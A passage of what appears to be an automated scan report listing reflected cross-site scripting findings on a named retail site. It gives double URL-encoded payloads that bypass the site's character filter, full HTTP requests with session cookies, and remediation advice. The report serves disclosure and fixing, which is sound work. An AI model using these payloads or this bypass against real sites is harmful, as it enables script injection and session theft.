Host: http://www.turnerlicensing.com
Path: /composition_books
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68ea5'style='x:expression(alert(1))'2936e399c82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /composition_books?68ea5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272936e399c82=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.64. http://www.turnerlicensing.com/desk_calendars [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /desk_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6de83'style='x:expression(alert(1))'5840fdf7ac4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /desk_calendars?6de83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275840fdf7ac4=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.65. http://www.turnerlicensing.com/espn [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /espn
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f0f4c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527718afdfa6fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0f4c'style='x:expression(alert(1))'718afdfa6fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.66. http://www.turnerlicensing.com/espn/8210571 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /espn/8210571
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e859e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252756d71373043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e859e'style='x:expression(alert(1))'56d71373043 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.67. http://www.turnerlicensing.com/home [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b6ece'style='x:expression(alert(1))'0391ff654b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /home?b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.68. http://www.turnerlicensing.com/magnetic_to-do_notes [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /magnetic_to-do_notes
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea298'style='x:expression(alert(1))'3a5ce7edc7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /magnetic_to-do_notes?ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.69. http://www.turnerlicensing.com/memo_books [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /memo_books
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70115'style='x:expression(alert(1))'e817eec67bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /memo_books?70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.70. http://www.turnerlicensing.com/nondated_combo_packs [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /nondated_combo_packs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1120'style='x:expression(alert(1))'8f5f8e675c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /nondated_combo_packs?d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.71. http://www.turnerlicensing.com/paper_and_desk_caddy [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /paper_and_desk_caddy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 524ea'style='x:expression(alert(1))'08e0d4230be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /paper_and_desk_caddy?524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.72. http://www.turnerlicensing.com/paper_cubes [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /paper_cubes
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6f7'style='x:expression(alert(1))'57f8f7591a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /paper_cubes?1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.73. http://www.turnerlicensing.com/portfolios [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /portfolios
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f0f7'style='x:expression(alert(1))'b5a9e77cfd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /portfolios?2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
The value of the bce72 request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b393c%2520style%253dx%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%2520c6dfa1617f7 was submitted in the bce72 parameter. This input was echoed as b393c style=x:expr/**/ession(alert(1)) c6dfa1617f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the bce72 request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /s.nl?sc=69&category=144026&bce72%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b0f27be55e7=1&bce72%27style%3d%27x%3aexpression%28alert%281%29%29%27b0f27be55e7=1&bce72b393c%2520style%253dx%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%2520c6dfa1617f7 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.75. http://www.turnerlicensing.com/s.nl [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.turnerlicensing.com
Path: /s.nl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9411e%2520a%253dbc04429bed98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9411e a=bc04429bed98 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /s.nl?sc=69&category=144026&bce72%2527style%253d%2527x%253aexpression%2528alert%2528document.cookies%2529%2529%2527b0f27be55e7=1&source=google_content_nba&bce72&9411e%2520a%253dbc04429bed98=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.76. http://www.turnerlicensing.com/s.nl [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /s.nl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c93f8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271465883b49a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c93f8'style='x:expression(alert(1))'1465883b49a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.77. http://www.turnerlicensing.com/s.nl/sc.34/.f [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /s.nl/sc.34/.f
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c55d7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276061abd1262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c55d7'style='x:expression(alert(1))'6061abd1262 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /s.nl/sc.34/.f?ck=rnoX2q9XAatYKaJC&vid=rnoX2kNXAZKv7gpK&cktime=87993&cart=148243&chrole=17&c55d7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276061abd1262=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.78. http://www.turnerlicensing.com/teams_by_state/Alabama [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Alabama
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd71c'style='x:expression(alert(1))'b08045fc3e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Alabama?bd71c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b08045fc3e2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.79. http://www.turnerlicensing.com/teams_by_state/Alaska [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /teams_by_state/Alaska
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d41a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25275bce84a02ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d41a'style='x:expression(alert(1))'5bce84a02ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
